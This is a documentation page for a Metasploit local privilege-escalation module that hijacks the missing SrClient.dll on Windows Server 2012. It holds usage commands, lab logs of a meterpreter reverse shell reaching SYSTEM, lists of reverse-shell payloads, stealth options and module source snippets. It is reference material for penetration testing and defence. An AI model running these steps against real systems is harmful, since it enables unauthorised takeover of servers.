Windows Server 2012 SrClient DLL hijacking - Metasploit
This page contains detailed information about how to use the exploit/windows/local/srclient_dll_hijacking metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: Windows Server 2012 SrClient DLL hijacking
Module: exploit/windows/local/srclient_dll_hijacking
Source code: modules/exploits/windows/local/srclient_dll_hijacking.rb
Disclosure date: 2021-02-19
Last modification time: 2021-09-08 21:56:02 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: -
All editions of Windows Server 2012 (but not 2012 R2) are
vulnerable to DLL hijacking due to the way TiWorker.exe will
try to call the non-existent SrClient.dll
file when
Windows Update checks for updates. This issue can be
leveraged for privilege escalation if %PATH% includes
directories that are writable by low-privileged users. The
attack can be triggered by any low-privileged user and does
not require a system reboot. This module has been
successfully tested on Windows Server 2012 (x64).
Module Ranking and Traits
Module Ranking:
- excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.
Stability:
- crash-safe: Module should not crash the service.
Side Effects:
- artifacts-on-disk: Modules leaves a payload or a dropper on the target machine.
- ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).
- screen-effects: Module may show something on the screen (Example: a window pops up).
Basic Usage
Note: To run a local exploit, make sure you are at the msf prompt.
Also, to check the session ID, use the sessions
command.
msf > use exploit/windows/local/srclient_dll_hijacking
msf exploit(srclient_dll_hijacking) > show targets
... a list of targets ...
msf exploit(srclient_dll_hijacking) > set TARGET target-id
msf exploit(srclient_dll_hijacking) > show options
... show and set options ...
msf exploit(srclient_dll_hijacking) > set SESSION session-id
msf exploit(srclient_dll_hijacking) > exploit
Required Options
- SESSION: The session to run this module on.
Knowledge Base
Vulnerable Application
All editions of Windows Server 2012 (but not 2012 R2) are vulnerable to DLL hijacking due to the way TiWorker.exe
will try to call the
non-existent SrClient.dll
file when Windows Update checks for updates.
This issue can be leveraged for privilege escalation if %PATH% includes directories that are writable by low-privileged users.
The attack can be triggered by any low-privileged user and does not require a system reboot.
If run with default settings, the module will enumerate the %PATH% directories and try to find one that is writable by the current user.
Alternatively, a specific %PATH% directory can be provided via the WRITABLE_PATH_DIR
option.
If a writable %PATH% directory is found, the module will write the payload with the name SrClient.dll
to the vulnerable directory.
Next, the module will try to obtain the Windows Update configuration.
If Windows Update is not set to never check for updates, the module will use the WUAUCLT /DetectNow
command to trigger the payload.
This command will instruct Windows Update to detect and download available updates in the background.
If Windows Update is set to never check for updates, WUAUCLT /DetectNow
will not work,
and the module will trigger the payload via the WUAUCLT /SelfUpdateManaged
command.
This command launches the Windows Update window in the Control Panel and tells it to start checking for updates using
Windows Server Update Services (WSUS).
If stealth is required, you can set the STEALTH_ONLY
option to prevent the module from proceeding with exploitation in this scenario.
If the module fails to obtain the Windows Update configuration, it will use WUAUCLT /SelfUpdateManaged
to trigger the payload
unless the STEALTH_ONLY
option is set. In the latter case, it will use the WUAUCLT /DetectNow
command.
This exploit has several limitations - The attack won't work when Windows Update is already checking for/downloading/installing updates on the target - The attack won't work twice in a row, at least not in quick succession (because the attack causes Windows Update to check for updates)
If the module completes, but no session is created, check if TiWorker.exe
is running on the target. If so, you have several options:
- Wait until TiWorker.exe
is no longer running before launching the module again.
- Set Wfsdelay
to a rather long period (at least half an hour), and run the module again.
- Reboot the machine if you have persistence on the target and the current user has shutdown privileges
(not recommended in a real world environment)
This module has been successfully tested on Windows Server 2012 (x64).
Windows Server 2012 VM images are available at the Microsoft Evaluation Center here.
Verification Steps
- Start msfconsole
- Do:
use modules/exploit/windows/local/srclient_dll_hijacking
- Do:
set SESSION [SESSION ID]
- Do:
run
Options
WRITABLE_PATH_DIR
The full path to a writable %PATH% directory to write the payload to. If this is not set, the module will enumerate the %PATH% directories and try to find one that is writable by the current user.
STEALTH_ONLY
If this is enabled, the module will only exploit the target if this is possible by triggering the payload via the
WUAUCLT /DetectNow
command, which will launch Windows Update in the background.
This means that exploitation will not proceed if Windows Update is set to never check for updates on the target.
WAIT_FOR_TOWORKER
The number of minutes to wait for TiWorker.exe to finish running if it is already active (because the exploit won't work if it is). The default value is 0.
Scenarios
Windows 2012 x64 - %PATH% enumeration (default) with Verbose set to true
msf6 exploit(windows/local/srclient_dll_hijacking) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
3 meterpreter x64/windows WIN-FCDUOQDT1NB\wynter @ WIN-FCDUOQDT1NB 192.168.91.12:8443 -> 192.168.91.16:49157 (192.168.91.16)
msf6 exploit(windows/local/srclient_dll_hijacking) > show options
Module options (exploit/windows/local/srclient_dll_hijacking):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 3 yes The session to run this module on.
STEALTH_ONLY false no Only exploit if the payload can be triggered without launching the Windows Update UI)
WAIT_FOR_TIWORKER 0 no No. of minutes to wait for TiWorker.exe to finish running if it is already active.
WRITABLE_PATH_DIR no Path to a writable %PATH% directory to write the payload to.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.91.12 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
1 Windows Server 2012 (x64)
msf6 exploit(windows/local/srclient_dll_hijacking) > run
[*] Started reverse TCP handler on 192.168.91.12:4444
[*] Executing automatic check (disable AutoCheck to override)
[*] Target is Windows 2012 (6.2 Build 9200).
[*] Obtaining group information for the current user WIN-FCDUOQDT1NB\wynter...
[*]
[*] Everyone
[*] BUILTIN\Users
[*] NT AUTHORITY\INTERACTIVE
[*] CONSOLE LOGON
[*] NT AUTHORITY\Authenticated Users
[*] NT AUTHORITY\This Organization
[*] NT AUTHORITY\Local account
[*] LOCAL
[*] NT AUTHORITY\NTLM Authentication
[*]
[*] Checking for writable directories in %PATH%...
[*]
[*] Checking permissions for C:\Windows\system32
[*] Checking permissions for C:\Windows
[*] Checking permissions for C:\Windows\System32\Wbem
[*] Checking permissions for C:\Windows\System32\WindowsPowerShell\v1.0\
[*] Checking permissions for C:\wynter
[*]
[+] WIN-FCDUOQDT1NB\wynter has write permissions to the following %PATH% directories:
[*]
[*] C:\wynter
[*]
[+] The target appears to be vulnerable.
[*] Writing 5120 bytes to C:\wynter\SrClient.dll...
[*] Trying to trigger the payload in the background via the shell command `wuauclt /detectnow`
[*] Sending stage (201283 bytes) to 192.168.91.16
[*] Meterpreter session 4 opened (192.168.91.12:4444 -> 192.168.91.16:49159) at 2021-02-16 08:59:24 -0500
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Windows 2012 x64 - WRITABLE_PATH_DIR option set, Verbose set to false
msf6 exploit(windows/local/srclient_dll_hijacking) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
8 meterpreter x64/windows WIN-FCDUOQDT1NB\wynter @ WIN-FCDUOQDT1NB 192.168.91.12:8443 -> 192.168.91.16:49158 (192.168.91.16)
msf6 exploit(windows/local/srclient_dll_hijacking) > show options
Module options (exploit/windows/local/srclient_dll_hijacking):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 8 yes The session to run this module on.
STEALTH_ONLY false no Only exploit if the payload can be triggered without launching the Windows Update UI)
WAIT_FOR_TIWORKER 0 no No. of minutes to wait for TiWorker.exe to finish running if it is already active.
WRITABLE_PATH_DIR c:\wynter no Path to a writable %PATH% directory to write the payload to.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.91.12 yes The listen address (an interface may be specified)
LPORT 5555 yes The listen port
Exploit target:
Id Name
-- ----
1 Windows Server 2012 (x64)
msf6 exploit(windows/local/srclient_dll_hijacking) > run
[*] Started reverse TCP handler on 192.168.91.12:5555
[*] Executing automatic check (disable AutoCheck to override)
[*] Target is Windows 2012 (6.2 Build 9200).
[*] Obtaining group information for the current user WIN-FCDUOQDT1NB\wynter...
[*]
[*] Checking for writable directories in %PATH%...
[*]
[+] WIN-FCDUOQDT1NB\wynter has write permissions to c:\wynter
[+] The target appears to be vulnerable.
[*] Writing 5120 bytes to C:\wynter\SrClient.dll...
[!] Because Windows Update is set to never check for updates, triggering the payload requires launching the Windows Update window on the target.
[*] Trying to trigger the payload via the shell command `wuauclt /selfupdatemanaged`
[*] Sending stage (201283 bytes) to 192.168.91.16
[*] Meterpreter session 9 opened (192.168.91.12:5555 -> 192.168.91.16:49160) at 2021-02-16 09:12:28 -0500
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Go back to menu.
Msfconsole Usage
Here is how the windows/local/srclient_dll_hijacking exploit module looks in the msfconsole:
msf6 > use exploit/windows/local/srclient_dll_hijacking
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/srclient_dll_hijacking) > show info
Name: Windows Server 2012 SrClient DLL hijacking
Module: exploit/windows/local/srclient_dll_hijacking
Platform: Windows
Arch:
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Excellent
Disclosed: 2021-02-19
Provided by:
Erik Wynter
Module side effects:
artifacts-on-disk
ioc-in-logs
screen-effects
Module stability:
crash-safe
Available targets:
Id Name
-- ----
0 Windows Server 2012 (x64)
Check supported:
Yes
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
STEALTH_ONLY false no Only exploit if the payload can be triggered without launching the Windows Update UI)
WAIT_FOR_TIWORKER 0 no No. of minutes to wait for TiWorker.exe to finish running if it is already active.
WRITABLE_PATH_DIR no Path to a writable %PATH% directory to write the payload to.
Payload information:
Description:
All editions of Windows Server 2012 (but not 2012 R2) are vulnerable
to DLL hijacking due to the way TiWorker.exe will try to call the
non-existent `SrClient.dll` file when Windows Update checks for
updates. This issue can be leveraged for privilege escalation if
%PATH% includes directories that are writable by low-privileged
users. The attack can be triggered by any low-privileged user and
does not require a system reboot. This module has been successfully
tested on Windows Server 2012 (x64).
References:
https://blog.vonahi.io/srclient-dll-hijacking
Module Options
This is a complete list of options available in the windows/local/srclient_dll_hijacking exploit:
msf6 exploit(windows/local/srclient_dll_hijacking) > show options
Module options (exploit/windows/local/srclient_dll_hijacking):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on.
STEALTH_ONLY false no Only exploit if the payload can be triggered without launching the Windows Update UI)
WAIT_FOR_TIWORKER 0 no No. of minutes to wait for TiWorker.exe to finish running if it is already active.
WRITABLE_PATH_DIR no Path to a writable %PATH% directory to write the payload to.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows Server 2012 (x64)
Advanced Options
Here is a complete list of advanced options supported by the windows/local/srclient_dll_hijacking exploit:
msf6 exploit(windows/local/srclient_dll_hijacking) > show advanced
Module advanced options (exploit/windows/local/srclient_dll_hijacking):
Name Current Setting Required Description
---- --------------- -------- -----------
AutoCheck true no Run check before exploit
ContextInformationFile no The information file that contains context information
DisablePayloadHandler false no Disable the handler code for the selected payload
EXE::Custom no Use custom exe instead of automatically generating a payload exe
EXE::EICAR false no Generate an EICAR file instead of regular payload exe
EXE::FallBack false no Use the default template in case the specified one is missing
EXE::Inject false no Set to preserve the original EXE function
EXE::OldMethod false no Set to use the substitution EXE generation method.
EXE::Path no The directory in which to look for the executable template
EXE::Template no The executable template file name.
EnableContextEncoding false no Use transient context when encoding payloads
FileDropperDelay no Delay in seconds before attempting cleanup
ForceExploit false no Override check result
MSI::Custom no Use custom msi instead of automatically generating a payload msi
MSI::EICAR false no Generate an EICAR file instead of regular payload msi
MSI::Path no The directory in which to look for the msi template
MSI::Template no The msi template file name
MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
WfsDelay 60 no Additional delay in seconds to wait for a session
Payload advanced options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
AutoLoadStdapi true yes Automatically load the Stdapi extension
AutoRunScript no A script to run automatically on session creation.
AutoSystemInfo true yes Automatically capture system information on initialization.
AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process
AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds
EnableStageEncoding false no Encode the second stage payload
EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal
HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports
InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript)
PayloadProcessCommandLine no The displayed command line that will be used by the payload
PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking)
PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID
PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic)
PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs
PingbackRetries 0 yes How many additional successful pingbacks
PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks
PrependMigrate false yes Spawns and runs shellcode in new process
PrependMigrateProc no Process to spawn and run shellcode in
ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
ReverseListenerBindAddress no The specific IP address to bind to on the local system
ReverseListenerBindPort no The port to bind to on the local system if different from LPORT
ReverseListenerComm no The specific communication channel to use for this listener
ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)
SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed
SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down
SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure
SessionRetryWait 10 no Number of seconds to wait between reconnect attempts
StageEncoder no Encoder to use if EnableStageEncoding is set
StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set
StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible
StagerRetryCount 10 no The number of times the stager should retry if the first connect fails
StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Exploit Targets
Here is a list of targets (platforms and systems) which the windows/local/srclient_dll_hijacking module can exploit:
msf6 exploit(windows/local/srclient_dll_hijacking) > show targets
Exploit targets:
Id Name
-- ----
0 Windows Server 2012 (x64)
Compatible Payloads
This is a list of possible payloads which can be delivered and executed on the target system using the windows/local/srclient_dll_hijacking exploit:
msf6 exploit(windows/local/srclient_dll_hijacking) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/generic/custom normal No Custom Payload
1 payload/generic/shell_bind_tcp normal No Generic Command Shell, Bind TCP Inline
2 payload/generic/shell_reverse_tcp normal No Generic Command Shell, Reverse TCP Inline
3 payload/windows/x64/exec normal No Windows x64 Execute Command
4 payload/windows/x64/loadlibrary normal No Windows x64 LoadLibrary Path
5 payload/windows/x64/messagebox normal No Windows MessageBox x64
6 payload/windows/x64/meterpreter/bind_ipv6_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager
7 payload/windows/x64/meterpreter/bind_ipv6_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Windows x64 IPv6 Bind TCP Stager with UUID Support
8 payload/windows/x64/meterpreter/bind_named_pipe normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Bind Named Pipe Stager
9 payload/windows/x64/meterpreter/bind_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Bind TCP Stager
10 payload/windows/x64/meterpreter/bind_tcp_rc4 normal No Windows Meterpreter (Reflective Injection x64), Bind TCP Stager (RC4 Stage Encryption, Metasm)
11 payload/windows/x64/meterpreter/bind_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Bind TCP Stager with UUID Support (Windows x64)
12 payload/windows/x64/meterpreter/reverse_http normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
13 payload/windows/x64/meterpreter/reverse_https normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (wininet)
14 payload/windows/x64/meterpreter/reverse_named_pipe normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse Named Pipe (SMB) Stager
15 payload/windows/x64/meterpreter/reverse_tcp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse TCP Stager
16 payload/windows/x64/meterpreter/reverse_tcp_rc4 normal No Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
17 payload/windows/x64/meterpreter/reverse_tcp_uuid normal No Windows Meterpreter (Reflective Injection x64), Reverse TCP Stager with UUID Support (Windows x64)
18 payload/windows/x64/meterpreter/reverse_winhttp normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTP Stager (winhttp)
19 payload/windows/x64/meterpreter/reverse_winhttps normal No Windows Meterpreter (Reflective Injection x64), Windows x64 Reverse HTTPS Stager (winhttp)
20 payload/windows/x64/meterpreter_bind_named_pipe normal No Windows Meterpreter Shell, Bind Named Pipe Inline (x64)
21 payload/windows/x64/meterpreter_bind_tcp normal No Windows Meterpreter Shell, Bind TCP Inline (x64)
22 payload/windows/x64/meterpreter_reverse_http normal No Windows Meterpreter Shell, Reverse HTTP Inline (x64)
23 payload/windows/x64/meterpreter_reverse_https normal No Windows Meterpreter Shell, Reverse HTTPS Inline (x64)
24 payload/windows/x64/meterpreter_reverse_ipv6_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline (IPv6) (x64)
25 payload/windows/x64/meterpreter_reverse_tcp normal No Windows Meterpreter Shell, Reverse TCP Inline x64
26 payload/windows/x64/peinject/bind_ipv6_tcp normal No Windows Inject Reflective PE Files, Windows x64 IPv6 Bind TCP Stager
27 payload/windows/x64/peinject/bind_ipv6_tcp_uuid normal No Windows Inject Reflective PE Files, Windows x64 IPv6 Bind TCP Stager with UUID Support
28 payload/windows/x64/peinject/bind_named_pipe normal No Windows Inject Reflective PE Files, Windows x64 Bind Named Pipe Stager
29 payload/windows/x64/peinject/bind_tcp normal No Windows Inject Reflective PE Files, Windows x64 Bind TCP Stager
30 payload/windows/x64/peinject/bind_tcp_rc4 normal No Windows Inject Reflective PE Files, Bind TCP Stager (RC4 Stage Encryption, Metasm)
31 payload/windows/x64/peinject/bind_tcp_uuid normal No Windows Inject Reflective PE Files, Bind TCP Stager with UUID Support (Windows x64)
32 payload/windows/x64/peinject/reverse_named_pipe normal No Windows Inject Reflective PE Files, Windows x64 Reverse Named Pipe (SMB) Stager
33 payload/windows/x64/peinject/reverse_tcp normal No Windows Inject Reflective PE Files, Windows x64 Reverse TCP Stager
34 payload/windows/x64/peinject/reverse_tcp_rc4 normal No Windows Inject Reflective PE Files, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
35 payload/windows/x64/peinject/reverse_tcp_uuid normal No Windows Inject Reflective PE Files, Reverse TCP Stager with UUID Support (Windows x64)
36 payload/windows/x64/powershell_bind_tcp normal No Windows Interactive Powershell Session, Bind TCP
37 payload/windows/x64/powershell_reverse_tcp normal No Windows Interactive Powershell Session, Reverse TCP
38 payload/windows/x64/shell/bind_ipv6_tcp normal No Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager
39 payload/windows/x64/shell/bind_ipv6_tcp_uuid normal No Windows x64 Command Shell, Windows x64 IPv6 Bind TCP Stager with UUID Support
40 payload/windows/x64/shell/bind_named_pipe normal No Windows x64 Command Shell, Windows x64 Bind Named Pipe Stager
41 payload/windows/x64/shell/bind_tcp normal No Windows x64 Command Shell, Windows x64 Bind TCP Stager
42 payload/windows/x64/shell/bind_tcp_rc4 normal No Windows x64 Command Shell, Bind TCP Stager (RC4 Stage Encryption, Metasm)
43 payload/windows/x64/shell/bind_tcp_uuid normal No Windows x64 Command Shell, Bind TCP Stager with UUID Support (Windows x64)
44 payload/windows/x64/shell/reverse_tcp normal No Windows x64 Command Shell, Windows x64 Reverse TCP Stager
45 payload/windows/x64/shell/reverse_tcp_rc4 normal No Windows x64 Command Shell, Reverse TCP Stager (RC4 Stage Encryption, Metasm)
46 payload/windows/x64/shell/reverse_tcp_uuid normal No Windows x64 Command Shell, Reverse TCP Stager with UUID Support (Windows x64)
47 payload/windows/x64/shell_bind_tcp normal No Windows x64 Command Shell, Bind TCP Inline
48 payload/windows/x64/shell_reverse_tcp normal No Windows x64 Command Shell, Reverse TCP Inline
49 payload/windows/x64/vncinject/bind_ipv6_tcp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager
50 payload/windows/x64/vncinject/bind_ipv6_tcp_uuid normal No Windows x64 VNC Server (Reflective Injection), Windows x64 IPv6 Bind TCP Stager with UUID Support
51 payload/windows/x64/vncinject/bind_named_pipe normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Bind Named Pipe Stager
52 payload/windows/x64/vncinject/bind_tcp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Bind TCP Stager
53 payload/windows/x64/vncinject/bind_tcp_rc4 normal No Windows x64 VNC Server (Reflective Injection), Bind TCP Stager (RC4 Stage Encryption, Metasm)
54 payload/windows/x64/vncinject/bind_tcp_uuid normal No Windows x64 VNC Server (Reflective Injection), Bind TCP Stager with UUID Support (Windows x64)
55 payload/windows/x64/vncinject/reverse_http normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
56 payload/windows/x64/vncinject/reverse_https normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (wininet)
57 payload/windows/x64/vncinject/reverse_tcp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager
58 payload/windows/x64/vncinject/reverse_tcp_rc4 normal No Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager (RC4 Stage Encryption, Metasm)
59 payload/windows/x64/vncinject/reverse_tcp_uuid normal No Windows x64 VNC Server (Reflective Injection), Reverse TCP Stager with UUID Support (Windows x64)
60 payload/windows/x64/vncinject/reverse_winhttp normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTP Stager (winhttp)
61 payload/windows/x64/vncinject/reverse_winhttps normal No Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse HTTPS Stager (winhttp)
Evasion Options
Here is the full list of possible evasion options supported by the windows/local/srclient_dll_hijacking exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 exploit(windows/local/srclient_dll_hijacking) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Go back to menu.
Error Messages
This module may fail with the following error messages:
- TiWorker.exe is already running on the target. The module will monitor the process every 10 seconds for up to <WAIT_FOR_TIWORKER> minute(s)...
- TiWorker.exe is no longer running on the target. Proceding with exploitation.
- Target is not Windows Server 2012.
- Target is Windows Server 2012 R2, but only Windows Server 2012 is vulnerable.
- Target is Windows Server 2012, but cannot be exploited because Windows Update has not been configured.
- Received unexpected reply when trying to obtain the Windows Update setting.
- Session is already elevated
- Unsupported payload architecture (<PAYLOAD_ARCH>). Only 64-bit (x64) payloads are supported.
- TiWorker.exe is already running on the target. Set `WAIT_FOR_TIWORKER` to force the module to wait for the process to finish.
- Because Windows Update is set to never check for updates, triggering the payload requires launching the Windows Update window on the target.
- Exploitation cannot proceed stealthily. If you still want to exploit, set `STEALTH_ONLY` to false.
- Windows Update is not configured or returned an unexpected value. Exploitation may not work.
- Using ForceExploit requires `WRITABLE_PATH_DIR` to be set.
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
TiWorker.exe is already running on the target. The module will monitor the process every 10 seconds for up to <WAIT_FOR_TIWORKER> minute(s)...
Here is a relevant code snippet related to the "TiWorker.exe is already running on the target. The module will monitor the process every 10 seconds for up to <WAIT_FOR_TIWORKER> minute(s)..." error message:
206: print_status("Trying to trigger the payload via the shell command `#{trigger_cmd}`")
207: end
208: end
209:
210: def monitor_tiworker
211: print_warning("TiWorker.exe is already running on the target. The module will monitor the process every 10 seconds for up to #{wait_for_tiworker} minute(s)...")
212: wait_time_left = wait_for_tiworker
213: sleep_time = 0
214: while wait_time_left > 0
215: sleep 10
216:
TiWorker.exe is no longer running on the target. Proceding with exploitation.
Here is a relevant code snippet related to the "TiWorker.exe is no longer running on the target. Proceding with exploitation." error message:
214: while wait_time_left > 0
215: sleep 10
216:
217: host_processes = client.sys.process.get_processes
218: if host_processes.none? { |ps| ps['name'] == 'TiWorker.exe' }
219: print_status('TiWorker.exe is no longer running on the target. Proceding with exploitation.')
220: break
221: end
222:
223: sleep_time += 10
224: next unless sleep_time == 60
Target is not Windows Server 2012.
Here is a relevant code snippet related to the "Target is not Windows Server 2012." error message:
230: end
231:
232: def check
233: # check OS
234: unless sysinfo['OS'].include?('2012')
235: return Exploit::CheckCode::Safe('Target is not Windows Server 2012.')
236: end
237:
238: if sysinfo['OS'].include?('R2')
239: return Exploit::CheckCode::Safe('Target is Windows Server 2012 R2, but only Windows Server 2012 is vulnerable.')
240: end
Target is Windows Server 2012 R2, but only Windows Server 2012 is vulnerable.
Here is a relevant code snippet related to the "Target is Windows Server 2012 R2, but only Windows Server 2012 is vulnerable." error message:
234: unless sysinfo['OS'].include?('2012')
235: return Exploit::CheckCode::Safe('Target is not Windows Server 2012.')
236: end
237:
238: if sysinfo['OS'].include?('R2')
239: return Exploit::CheckCode::Safe('Target is Windows Server 2012 R2, but only Windows Server 2012 is vulnerable.')
240: end
241:
242: print_status("Target is #{sysinfo['OS']}")
243:
244: # obtain the Windows Update setting to see if exploitation could work at all
Target is Windows Server 2012, but cannot be exploited because Windows Update has not been configured.
Here is a relevant code snippet related to the "Target is Windows Server 2012, but cannot be exploited because Windows Update has not been configured." error message:
244: # obtain the Windows Update setting to see if exploitation could work at all
245: @wupdate_setting = registry_getvaldata('HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WindowsUpdate\\Auto Update', 'AUOptions')
246:
247: if @wupdate_setting.nil?
248: # if this is true, Windows Update has probably never been configured on the target, and the attack most likely won't work.
249: return Exploit::CheckCode::Safe('Target is Windows Server 2012, but cannot be exploited because Windows Update has not been configured.')
250: end
251:
252: unless (1..4).include?(@wupdate_setting)
253: return Exploit::CheckCode::Unknown('Received unexpected reply when trying to obtain the Windows Update setting.')
254: end
Received unexpected reply when trying to obtain the Windows Update setting.
Here is a relevant code snippet related to the "Received unexpected reply when trying to obtain the Windows Update setting." error message:
248: # if this is true, Windows Update has probably never been configured on the target, and the attack most likely won't work.
249: return Exploit::CheckCode::Safe('Target is Windows Server 2012, but cannot be exploited because Windows Update has not been configured.')
250: end
251:
252: unless (1..4).include?(@wupdate_setting)
253: return Exploit::CheckCode::Unknown('Received unexpected reply when trying to obtain the Windows Update setting.')
254: end
255:
256: # get groups for the current user, this is necessary to verify write permissions
257: current_user = session.sys.config.getuid
258: user_groups = grab_user_groups(current_user)
Session is already elevated
Here is a relevant code snippet related to the "Session is already elevated" error message:
293: return Exploit::CheckCode::Appears
294: end
295:
296: def exploit
297: if is_system?
298: fail_with(Failure::None, 'Session is already elevated')
299: end
300:
301: payload_arch = payload.arch.first
302: if (payload_arch != ARCH_X64)
303: fail_with(Failure::BadConfig, "Unsupported payload architecture (#{payload_arch}). Only 64-bit (x64) payloads are supported.") # Unsupported architecture, so return an error.
Unsupported payload architecture (<PAYLOAD_ARCH>). Only 64-bit (x64) payloads are supported.
Here is a relevant code snippet related to the "Unsupported payload architecture (<PAYLOAD_ARCH>). Only 64-bit (x64) payloads are supported." error message:
298: fail_with(Failure::None, 'Session is already elevated')
299: end
300:
301: payload_arch = payload.arch.first
302: if (payload_arch != ARCH_X64)
303: fail_with(Failure::BadConfig, "Unsupported payload architecture (#{payload_arch}). Only 64-bit (x64) payloads are supported.") # Unsupported architecture, so return an error.
304: end
305:
306: # check if TiWorker.exe is already running, in which case exploitation will fail
307: host_processes = client.sys.process.get_processes
308: if host_processes.any? { |ps| ps['name'] == 'TiWorker.exe' }
TiWorker.exe is already running on the target. Set `WAIT_FOR_TIWORKER` to force the module to wait for the process to finish.
Here is a relevant code snippet related to the "TiWorker.exe is already running on the target. Set `WAIT_FOR_TIWORKER` to force the module to wait for the process to finish." error message:
305:
306: # check if TiWorker.exe is already running, in which case exploitation will fail
307: host_processes = client.sys.process.get_processes
308: if host_processes.any? { |ps| ps['name'] == 'TiWorker.exe' }
309: unless wait_for_tiworker > 0
310: fail_with(Failure::Unknown, 'TiWorker.exe is already running on the target. Set `WAIT_FOR_TIWORKER` to force the module to wait for the process to finish.')
311: end
312:
313: monitor_tiworker
314: end
315:
Because Windows Update is set to never check for updates, triggering the payload requires launching the Windows Update window on the target.
Here is a relevant code snippet related to the "Because Windows Update is set to never check for updates, triggering the payload requires launching the Windows Update window on the target." error message:
319: ## 'wuauclt /selfupdateunmanaged': This triggers the payload by launching the Windows Update UI, which then scans for updates using the Windows Update site. This is not stealthy, but works with all Windows Update settings.
320: ## the module prefers /selfupdatemanaged over /selfupdateunmanaged when /detectnow is not possible because /selfupdateunmanaged may require the target to be able to reach the Windows Update server
321:
322: case @wupdate_setting
323: when 1
324: print_warning('Because Windows Update is set to never check for updates, triggering the payload requires launching the Windows Update window on the target.')
325: if stealth_only
326: fail_with(Failure::Unknown, 'Exploitation cannot proceed stealthily. If you still want to exploit, set `STEALTH_ONLY` to false.')
327: return
328: end
329: trigger_cmd = 'wuauclt /selfupdatemanaged'
